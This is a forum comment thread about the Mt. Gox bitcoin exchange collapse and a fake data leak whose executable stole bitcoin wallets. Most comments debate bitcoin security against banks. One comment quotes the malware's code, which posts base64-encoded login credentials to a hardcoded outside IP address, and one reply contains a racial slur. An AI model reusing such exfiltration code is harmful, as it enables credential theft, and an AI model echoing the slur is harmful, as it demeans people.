Oh, really? That's what Bitcoin's meant for? Well, couldn't that have been cleared up from the beginning! I honestly read a lot of Bitcoin's advocates as claiming that Bitcoin was intended to be some kind of decentralized universal currency intended for any transaction type, from tipping Redditor whose comments you like to buying Tesla cars. But if it's actually just intended for international direct transfers then its many flaws as a supposed universal currency are less of an issue I guess.

Re:Really?

[Ralph+Wiggam]

But your fantasy of the the vault all bitcoin is stored in being raided - that has never happened.

6% of all of the bitcoins in existence got stolen a few weeks ago. It was merely the highest profile in a string of huge robberies.

Re:Really?

[codebonobo]

lol...have you ever heard of FDIC? Consumer protections? None of these things apply to bicoin and never will. My bank can be vaporized out of existence and it wouldn't do shit to me.

Bitcoin Hot wallets can be insured if you want just like FDIC backed banks.Lloyds of London is one of the oldest and most trusted insurance companies in existence.

https://www.elliptic.co/vault

https://xapo.com/

Re:Really?

[Agent0013]

I'm not trying to say Bitcoin is the answer. It does appear to be the exchanges that are having problems and not the currency itself though.

The real point I want to make is that FDIC insurance has a limit. So if a bank goes under and loses all the money of the people that have put their money into that bank, each account only gets back $250,000. So people who have millions of dollars in the bank will lose out just the same as people who left their Bitcoins in Mt Gox. And in the FDIC case it is all legal, so there is no hope (however slight) that law enforcement might try to get it back for you.

Re:Really?

[SinisterEVIL]

The consensus between economist, politicians and scientist alike all agree that crypto currency is here to stay. Why do you disagree that bitcoin is not to be trusted?

Re:Really?

Well, except that none of the bitcoin "problems" or exploits have been with bitcoin itself. It's always some 3rd party poorly coded bullshit software (eg. exchanges, pools, online wallets, etc).

So far no one has managed to exploit bitcoin itself.

That's not even remotely true.

The problem described in this summary is a piece of malware that looks for and steals Bitcoin wallets stored on the computer used to view data about MtGox's recent crash.

The paper money equivalent would be if the newspaper by virtue of including an article on Bank of America managed to steal the paper bills you had stored under your mattress.

This is a practical example of a way in which Bitcoin (and crypto-curency in general) is fundamentally less secure than "physical artifact" money. By virtue of existing only as data on a computer they are exposed to the wide range of common attacks used to copy data from a computer without the owner's knowledge or consent.

The claims that "Bitcoin itself hasn't been compromised" are missing the point because they're equating counterfeiting money with stealing money. Sure no one has figured out how to counterfeit Bitcoin yet, but there have been rater a lot of successful thefts of Botcoin.

Re:Really?

[QilessQi]

Good point, which is why it's a good idea to diversify your assets among multiple banks and multiple account types at each bank (e.g., $250K in Savings, $250K in an IRA, etc.): in that manner you can have far more than $250K secured by FDIC. I'll wager that most Americans don't hit that $250K limit, and the ones who are way above it have other ways of securing their portfolio against disaster. For example, you can insure your retirement funds independently.

Now consider, why was FDIC brought into existence back in the 1930s? Because of the stock market crash of '29 and the subsequent Great Depression. People learned the hard way that they couldn't just take their money out of the bank if the bank became insolvent. The FDIC was created by the US government to restore confidence in the banking system and encourage savings/investment again.

As Wikipedia notes, "The FDIC also examines and supervises certain financial institutions for safety and soundness, performs certain consumer-protection functions, and manages banks in receiverships (failed banks)." And how does it do this? "Insured institutions are required to place signs at their place of business stating that "deposits are backed by the full faith and credit of the United States Government."

I could be mistaken, but this form of oversight appears to be precisely where many Bitcoin enthusiasts don't want to go. They prefer to be free from government interference. Which is fine, if you like living in the Wild West. Most people didn't, which is why the Wild West was tamed. :-)

Re:Really?

SOME of those issues can't happen with bitcoin. You can't hold less money than people have given you and operate on the principle that not everyone is going to take everything out at once, because each coin is tracked. So there are benefits. There are also ways to regulate via the protocol that haven't been fully implemented yet, it's obvious that more work in this area needs to happen.

Government regulation can't be counted on for a worldwide economy (hasn't that been proven enough at this point ?!)

Everyone is freaking out about the bitcoin scams, and forgetting that it was the "regulated" industry scams that broke the world economy, and led to bitcoin being invented.

Re:Really?

[Ralph+Wiggam]

Except Mt.Gox was never a bank,

Yet somehow they possessed 6% of all the bitcoins in existence.

Re:Really?

[ras]

6% of all of the bitcoins in existence got stolen a few weeks ago. It was merely the highest profile in a string of huge robberies.

True. But what does that have to do someone breaking into a bank vault? Mtgox isn't a bank. They are a broker - they buy and sell bitcoins. Some people gave them bitcoins to sell, but they lost (by double spending them) them instead.

As I said elsewhere in this thread, here we have yet another example of someone who don't have a clue about what bitcoin is or how it operates, making a comment demonstrating his ignorance in spades and that comment modded to +5.

Re:Really?

[ttucker]

Nobody has ever stolen my cash by making a copy of it. My cash has never been stolen from a computer hard drive. I agree, BitCoin is a bearer insturment like cash. That said, you must admit that there are striking differences, and that there is a clear and present risk involved with keeping something so easily, and irreversibly stolen, in a computer.

Re:Really?

[ttucker]

This is a good point, some wire transfers are irreversible... it is exactly the purpose of the money mule scheme. To initiate a wire transfer, the customer interaction required at a bank is comparable to that which is required to withdraw cash. The secrets required to do this are much less frequently available in a computer to a hacker than say, a credit card number and CCV. If wire transfers were easy, there would be no need for a money mule.

In the case of the money mule scam, the person who initiates the wire transfer is doing so intentionally, with the proper credentials. While they are defrauded, the wire transfer is entirely legitimate, and can not be reversed.

Re:Really?

[ttucker]

While it is true that the transfers are not reversible on a whim, the bank is still liable to prove that the customer initiated the transaction, much the same as if someone appeared at the bank and withdrew cash.

Re:Really?

[ras]

While it is true that the transfers are not reversible on a whim, the bank is still liable to prove that the customer initiated the transaction, much the same as if someone appeared at the bank and withdrew cash.

Yes. But this is only because the banks can and do make mistakes, signatures can be forged and so on. One of the fundamentals bitcoin is built on is it never makes a mistake like that. Every addition to the block chain is checked by every miner, so if some random miner suffers a bit error in RAM, it will be rejected by the network. The whim part is taken care of by requiring the customer to sign the transaction using a digital signature. It can't be forged. Either the customer authorised the transaction, or they did the equivalent of giving away their banking password.

And since bitcoin can't make mistakes like the ones you are alluding to, it can uphold the normal banking standards you describe and yet not need to do a reversals.

Re:Really?

[Atzanteol]

Which is what needs to be remembered in all of these bitcoin discussions. If I gave cash to "some guy" and he stole it nobody would be saying "well you just can't trust paper currency!" They'd be saying "why the fsck did you give your money to 'some guy?"

Re:Really?

[HornWumpus]

Social Security Trust Fund!

It's not even close.

Re:Really?

[Atzanteol]

You're surprised people can be that stupid?

Re:Really?

[HornWumpus]

People who invested with Madoff knew he was a criminal. They just thought he was their criminal. Fuck them. Same as people who left bitcoin in MtGox.

A fool and his money were lucky to get together in the first place.

Re:Really?

[mysidia]

they are all covered by some kind of insurance.

You are probably covered by a special policy with a private insurance company [* Although in the event of massive theft insurance company may be found insolvent, policy may not actually exist, or the situation may have voided coverage], is a HECK of a lot different than, Your deposit is guaranteed by the FDIC, backed up by the full faith and credit of the US government.

Re:Really?

[ras]

I said that transaction malleability was exploited by hackers; it was.

I thought I was pretty clear when I said it wasn't.

The fact that the Bitcoin software no longer has this bug does not change the fact that it once did have this bug, and that this bug has been exploited.

Again no, as far as I know it was never exploited. But I can see you prefer to believe an internet echo chamber confirming your world views over me over me, who is saying you are just plain wrong. More on the dangers of doing that later. For now I assume you really are willing to discard your tin foil hat if you understood what happened. Unfortunately that is going to require going into some detail.

The transaction malleability problem we are discussing here is actually about how the transaction signature is represented. As I said, there are other causes of malleability, some of which haven't been fixed. The transaction signature is particularly important because the bitcoin protocol uses it to identify the transaction. When used in that manner the same piece of information is called a transaction id. Because it does uniquely identify a transaction once it is accepted into the block chain bitcoin exchanges sometimes use the transaction id to match for transactions they have generated.

The different ways of representing a transaction id doesn't effect the core operators of bitcoin, so it was never regarded as serious. The reason it didn't effect bitcoin is two otherwise identical transactions with different transaction id's look like a double spend. Naturally the bitcoin protocol rejects all but the first attempt, so it doesn't matter how many different transaction id's you throw at it. Bitcoin is based on the premise that there is one and only one true and correct transaction history – and that is the block chain. You can throw any rubbish you like at it (and there have been many attempts at DDOS it by doing just that), but as far as bitcoin is concerned the only transactions that exist are the ones that get appended to the block chain. So if there are transactions with multiple id's, it is the id that gets into the block chain that is the official one. The rest never happened.

So far I expect this matches your understanding of the root cause of the problem. It is about now we depart from that.

The transaction signature / id is a ECDSA signature. Here is a real one: 770a723381d3edbcbfd06cecdd7b9f8569e9691d3a06a8a9c8972dd6fcbc8493 . It looks remarkably like a fixed length SHA checksum doesn't it? It's not. An ECDSA signature is two large numbers, which in bitcoin is encoded in DER format. DER format is used because, quoting from that Wikipedia link: “DER is a subset of BER providing for exactly one way to encode an ASN.1 value the shortest possible length encoding must be used”. Which sort of begs the question “how it be malleable”? It isn't. But, the software the reference bitcoin software uses to produce and decode these signatures is openssl, and like all good internet software openssl follows Postel's Law: “"Be liberal in what you accept, and conservative in what you send”. So OpenSSL always generates valid bitcoin signatures, but it accepts invalid ones, and in particular numbers with leading zeros. Whether you call this a bug or feature is more a matter of taste than anything else.

This bug / feature was noticed by the bitcoin developers some 3 years ago. It wasn't viewed as serious. As I said, it doesn'

Re:Really?

[mysidia]

Nobody has ever stolen my cash by making a copy of it.

And nobody has ever stolen any of my bitcoins by picking my pocket.

In fact... they couldn't. They'd need my security codes to unlock my private key. Just like they'd need my ATM PIN number to go steal cash out my bank account.

there is a clear and present risk involved with keeping something so easily, and irreversibly stolen, in a computer.

There is no requirement to keep your private key on a computer.

You can have a large number of paper wallets with small amounts on each, and only go get it out of the vault and scan the key into your computer when needed to execute a transaction.

There are also various hardening methods -- such as putting your coins in a form where two signatures will be required to unlock; using a verification script where your certain dedicated holding wallets have coins they can only spend to certain "staging" wallets and no other address.

Using a signing procedure requiring two-factor authentication, with neither the computer, nor your portable device privvy to the full private key, but both required to participate in signing, etc.

Re: Really?

You actually can't prove it's secure...
It's based on cryptography, so you don't actually know it's as good as money.

Re: Really?

Sure they can hold less money than deposited. How the fuck do you suppose they profit from it? You think money sitting in a cupboard magically multiplies? Even normal banks don't do that.

Re:Really?

[david_thornley]

Except that not every bitcoin transaction is made by the owner. There are exploits for that. It seems disingenuous to refer to bitcoin as not having mistakes when it is possible for some people to make fraudulent transactions.

Ah, I see that "the equivalent of giving away their banking password" is rearing its head here. Note that doing that can consist of running a computer with a fully patched operating system, anti-malware protection, etc., if it's on line. Computer security is far from what it would need to be to make this practical.

Re:Really?

[ras]

Except that not every bitcoin transaction is made by the owner.

I am not sure what you mean. Every spend of your bitcoins has to be signed by your private key. It doesn't have to be submitted by you, but it must be authorised by you by that signature.

Note that doing that can consist of running a computer with a fully patched operating system, anti-malware protection, etc., if it's on line.

Hmmm. What do you think bitcoin is good for? Do you think it is the equivalent of storing your life's savings under a mattress, or doing transactions?

You can use it to do either. The mattress scenario is easy enough. You just print your private keys out a few times on a piece of paper, and put them in safe deposit boxes. To put money under the mattress you just transfer funds to that key. You don't need access to the private key to do that. To get a large lump out of the mattress is appropriately more difficult and tedious. You disconnect the network, boot off a live CD, create the necessary transaction and put it on a USB key, reboot and send the transaction. It may be painful (although maybe not as painful as having to visit a bank), but it's safe from virus and hackers.

However, the mattress isn't what bitcoin is meant to be good at. It's forte is doing transactions cheaply and quickly. A far more likely scenario is putting the amount of cash you would normally carry around in your wallet into your phone instead. Just like traditional cash, this is an amount of money you can afford to lose.

Computer security is far from what it would need to be to make this practical.

Actually, it isn't. True, traditional PC's aren't secure. But Android and iOS devices together with their TPM's are more than secure enough. They are so secure not even the FBI can crack an encrypted iPhone - they have to be sent back to Apple. Just like a wallet the risk comes more from losing the damned thing rather than it being cracked by a remote hacker. But unlike a real wallet, these devices can actively assist with security. They can demand PIN's, or fingerprints. They can restrict how many bitcoins can be paid out to an unknown keys in a day.

However, the reality is that in the country I live in at least, direct transfers between banks are already so fast (read: seconds), and so cheap (read: free, between any bank in the country, regardless of who owns it or how far away it is) that bitcoin is going to have a hard time competing. I gather the US still uses cheques and bankers deliberately make dealing with competitors difficult. They may have created fertile ground for new weeds like bitcoin to grow in. When it comes to international transfers, where I wear all the risk and yet it still costs a 10's of dollars to transfer money, things are definitely different. And surprise, surprise, it is in international transfers that bitcoin is seeing the most use right now.

Re:Really?

[mysidia]

Bitcoin is not an insured bank, gone means gone with no legal recourse. Yes, skimmers exist. Credit card companies have far more protection against fraud.

ATM cards don't. If someone steals from you over time, and you don't notice, within the next two statements, you are essentially out 100% of what was stolen.

With Bitcoins, you can generate and print out say 50 paper wallets, put no more than $50 in any one wallet; lock up the secret keys in your safe; you can divide your funds any which way you want.

Someone steals one... you are out a maximum of $50. That's also your potential liability in case of a stolen credit card.

Re:Really?

[Chas]

And a ponzi scheme always needs an increasing amount of money to keep going (ie next year more $$ needs to go in than last year). That doesn't seem to be a feature of the Bitcoin ecosystem.

Really? Currently you have a virtually generated currency system that hasn't reached it's maximum number of coins generated.

So yes, you have an increasing number of BTC coming into the system.

You also have all these sucker^H^H^H^interested individuals helping to bloat the "value" of BTC in the short term.

Plus sideline of space heater (BTC mining rig) sales.

And remember that ponzi schemes always, eventually, crash. As they eventually run into a situation where people inevitably want to cash out faster than there is new money coming in.

The same thing will (and it could be successfully argued, IS) happen here as well.

This just gets better and better

[VTBlue]

This becoming comical to the point of absurdity.

Re:This just gets better and better

This is a lolcow that will never run dry.

Slowpoking hard, aren't we?

[gustgr]

This was known minutes after the leak was released. You disappoint me, slashdot.

Re:Slowpoking hard, aren't we?

[gustgr]

Also, the MtGox2014Leak.zip file is 750672322 bytes. The trades.zip file is 622555932 bytes.

Re:Slowpoking hard, aren't we?

Sorry, this news story would have made it to the front page faster if it would have involved Tesla Motors or Google Glass.
 
-The Slashdot Team

Leak

[gustgr]

The leak is real, nonetheless. I found my balance and transactions there.

Re:Leak

[WinstonWolfIT]

The data is publicly available.

Re:Leak

[Kjella]

Of course, just like repacked cracks usually do provide you with working software - and a trojan/malware infection. Why would you want to fight negative comments and complaints that it's fake when you can deliver and turn your victims into willing advocates and distributors?

Re:Leak

[gustgr]

The thing is, you don't need that .exe to access the leaked data. The leaks are just a bunch of csv files. I never run the .exe.

Old news.

[Janek+Kozicki]

Coindesk already wrote about that almost two weeks ago!

Re:Old news.

[rmdingler]

We're like the Supreme Court here, Janek.

If you make your way successfully through district and appeals, we might be willing to hear and comment on your case.

Re:Old news.

Old news indeed. Mr. Sergey Lozhkin should have checked reddit...

Re:Old news.

[guacamole]

Yeah, but slashdot is not coindesk. I still appreciate this gets posted on /.

Censored content revealed

[boulat]

Looks like someone posted code that shows the censored IP http://pastebin.com/w2EWMp35

Re:Censored content revealed

[mythosaz]

I'm mostly amused by the User-Agent:

      set the httpHeaders to "User-Agent: MtGoxBackOffice v0.1.2"
      libURLSetSSLVerification false
      post base64Encode("action=login&user="&field "l"&"&pass="&keyBuff&return) to "http://82.118.242.145/admin/tibanne-admin.php"

Re:Censored content revealed

Anyone know what language that code is?

Re:Censored content revealed

LiveCode. From the week old reddit thread linked elsewhere on this page:

Nope. I read source code directly from memory. LiveCode stores this encrypted and compressed in the executable. So I traced it until it was unencrypted and uncompressed and then simply copied and pasted.

Ultimately, Bitcoin was...

...a government plot to concentrate dark money into preferred hands.

Re: Really???

[rmdingler]

Mt Gox, thee top exchange for turning bitcoins into coin of the realm,

turned out to be a house of phosphorous cards,

and you don't see a red flag waving?

Was your retirement locked up in there and now you find yourself too poor to pay attention?

Tattoo spots the LOST MISSING SKYHACKED plane

And he says,
Da plane!
Da plane!

Re:Tattoo spots the LOST MISSING SKYHACKED plane

lol +1. you're still a retarded nigger:)

No Linux version

You can keep trying to suggest Linux is sufficiently mainstream by now, but if even the ultimate in geekness, an exchange for Bitcoins, didn't bother developing a Linux version of the malware for stealing biocoins, then you know that Linux is not even given credit by the geek community. Stop wasting your life trying to convert to Linux and go back to Windows; at least you know it has a future.

no web depository or vault is safe as long as its

no web depository or vault is safe as long as its up to one gatekeeper to allow withdrawals - mt gox has historically been very slow to allow withdrawals - one year ago and more, many many complaints from mt gox members regarding inability to withdraw funds - karpeles always had excuses even back then and that is bitcoin's fatal flaw.

Not from the customer's point of view

[Camael]

...except this was no different from someone doing the same thing to a bank. Your arguement is invalid

Except that the current banking system has failsafes to protect the depositor, even if the bank is at risk. For those who still use it, bank books and pass books record how much is in your bank account. Ditto for the monthly statements sent to depositors who have an electronic account, which is a hard copy in your hand. In many jurisdictions, these are legal evidence of a debt owed by the bank to you. Most banks are insured, both privately and by their respective governments.

If you are just a normal depositor stashing your cash in a bank account, you are much more likely to recover something in the event a bank is (electronically) robbed. Take for example the relatively recent collapse of Barings Bank - according to the Bank Of England Report on the Collapse of Barings, the interests of depositors and creditors were still protected although the bank was closed. Compare this with the uncertain fate of the Bitcoin depositors of Mt. Gox which just recently filed for bankruptcy.

The truth is that depositing funds in Bitcoins right now involves taking a substantial risk which is much higher than putting it into the current banking system. Deluding uninformed investors that investing in Bitcoins is "no different" from putting it in a bank is untrue and is likely to greatly harm the Bitcoin cause once these investors are burnt.

Re:Not from the customer's point of view

[RogWilco]

But that isn't an inherent attribute of the currency, that's an attribute of the US banking system. Simply storing your money in USD does not offer any such failsafes. If I store my USD cash in an insecure manner (on the dresser in a shitty hotel with underpaid employees), the FDIC is not going to reimburse me when it gets stolen because they were US dollars. Why can the same not be said for Bitcoin? Just like having USD in cash, it's not the currency that is the problem, it's the method of storing it. Perhaps Bitcoin doesn't yet have the same robust infrastructure and collection of institutions built around it like most first-world currencies, but that is not because of some inherent flaw with Bitcoin, that's because of its relatively young age as a currency.

This kind of thing is why I got rid of my Bitcoins

[Bryan+Ischo]

Almost every aspect of Bitcoin is just seeping with get rich quick scammers, schemers, and thieves and just general disgusting lowlifes. Whatever money I might have made by holding onto my bitcoins, it was worth to lose just to get out of Bitcoin and not have to associate myself with that den of scum and villianry anymore.

Re:This kind of thing is why I got rid of my Bitco

Ah, so you've finally become a Buddhist and renounced all material possessions and currencies.

Re:This kind of thing is why I got rid of my Bitco

[Neo-Rio-101]

You'll find the same with the forex market and other dodgy investment schemes.

Trading and investing is basically a game of "who is the better legal scammer".
At it's core, it's a game with it's own rules and dirty (but legal) tricks and unsportsmanlike behavior.

Different forms, same effect

[Camael]

There is zero counterfeit bitcoin. You can't say the same about paper currency.

Technically correct, since bitcoin does not exist in physical form and therefore cannot be counterfeited in physical form.

But can transactions involving bitcoins be counterfeited? Most certainly!

Mt. Gox, Bitstamp, and other Bitcoin exchanges have temporarily suspended withdrawal transactions after coming under a form of a denial-of-service attack that abuses weaknesses in the way they keep track of fund balances, a security expert said.

Andreas M. Antonopoulos, chief security officer of digital wallet developer Blockchain, said the attacks work by flooding exchanges with a large number of malformed transactions that are similar, but not identical, to legitimate transactions that were already made. Exchanges that trust one or more of the fake records instead of the entries in the official Bitcoin blockchain quickly fall out of sync with the rest of the network and must recalculate their fund balances once the mistakes become apparent.

The net effect is the same. Counterfeit paper currency deprives its holders of the value of that currency. Counterfeit bitcoin transactions deprive the owners of the bitcoins involved in that transaction of the value of those bitcoins.

Re:Different forms, same effect

Incorrect.

"Counterfeit transactions" can't just get free money out of someone - they can confuse some BTC clients into thinking that transaction failed (reference implementation doesn't, IIRC). Making them repeat the transaction is separate step.

Think someone telling you that check you sent got lost in the mail (and you just trusting and writing a new one).

PS: MtGox's story sounds like a pile of bullcrap and/or giant incompetency in this regard. Either, not very believable and "That's typical PHP programmer for you!" worthy, their software was automatically resending failed transactions (instead of, you know, *failing* and reporting the fail), nobody audited the logs and nobody did financial audits until they lost an equivalent of half a billion dollars. Or worse, and even less believable - their techsupport resent those transactions and didn't even bat an eyelash until they lost 700kBTC.

Re:This kind of thing is why I got rid of my Bitco

After these recent heists about 7% or more of all bitcoin ever mined is controlled by thieves.

Am I the only one laughing?

Bitcoin was obviously scamtastic and doomed from the start.

Re:Am I the only one laughing?

Son, I ain't laughing. I held some 2900+ Bitcoin in '09. It was worth less than one hundred dollars, TOTAL. I got out way early. Goddamnit

Re: Really???

So hold Bitcoins as money for people that accept Bitcoins as money. Don't exchange your Bitcoins for government backed fiat money.

It's worse when it's bitcoin

Except that when this happens to a bank, the money can be more easily traced and recovered.

The claimed virtues of bitcoin (anonymonity, non-reversability) make these attacks an order of magnitude worse when applied tIo bitcoin, compared to conventional internet banking.

But the thief _has_ to be near you to steal it.

Geographical and physical limitation is key part of most security systems

Coin forgery ...

[garyebickford]

... has been going on for almost as long as coinage itself. One of the advantages of paper money (in addition to weight, lower manufacturing cost, etc.) is that it can be harder to forge. Any shmuck with a press can create coins that are hard to distinguish from the real thing. On a larger scale, one of the big problems today with gold is people hollowing out gold bars and filling them with tungsten, or starting with tungsten and wrapping a small amount of gold. These are indistinguishable from the real thing, for the non-expert and even for experts without the necessary equipment (and suspicion).

IANA bitcoin holder, but having looked into the original Nakamoto paper (which is short and much better than any of the derivatives), and discussed this with people who know, the bitcoin methodology or protocol or whatever is with us to stay, and will be used for a lot of things beyond just digital money. The same methodology will be essential for things like secure confirmed transactions between entities far distant from each other (like space stations, moon colonies, etc. - this happens to be one of my interests); it will be used for 'digital contracts' with its internal scripting system, and perhaps even for guaranteed unique digital identity; and it has the powerful feature that it doesn't depend on any external agency - governments or whatever. So bitcoin itself is having growing pains, and it may or may not survive and grow, but don't believe that the methodology won't be an essential part of many future activities.

Re: Publicly availalbe myth

Yes, the data is publicly available NOW after it was leaked. duh.

The trade history at MtGox has always been publicly available. The trade history with user IDs isn't. The complete set of user balances is not publicly available (that data is now available thanks to the leak). The history of BTC deposits and withdraws at MtGox is not available except for the leaked document.

i d

" restore those stolen coins to the hands of their rightful owners." -what? I bet you have no idea how bitcoin works :-)

Re:This kind of thing is why I got rid of my Bitco

[Bryan+Ischo]

"legal scammer" is an oxymoron, but I suspect you know that.

I also suspect that you know there is a real difference between legal forms of investment, with which you will find associated every kind of good and bad person in the world, but predominantly "normal" people availing themselves of opportunities to invest their money as they see fit, and generally with protections and expectations of security that are in the vast majority of cases respected.

Then you have bitcoin, where you have an extremely high chance that the person on the other end of your transaction is a scammer, unless you know them personally. And where, almost any discussion in any forum invites the participation of every kind of greedy do-nothing imaginable, along with the aforementioned outright thieves and scum.

I say this from experience. There is almost no aspect to my involvement in bitcoin that wasn't flavored to some degree, usually to a large degree, by the scumminess of the average bitcoin participant.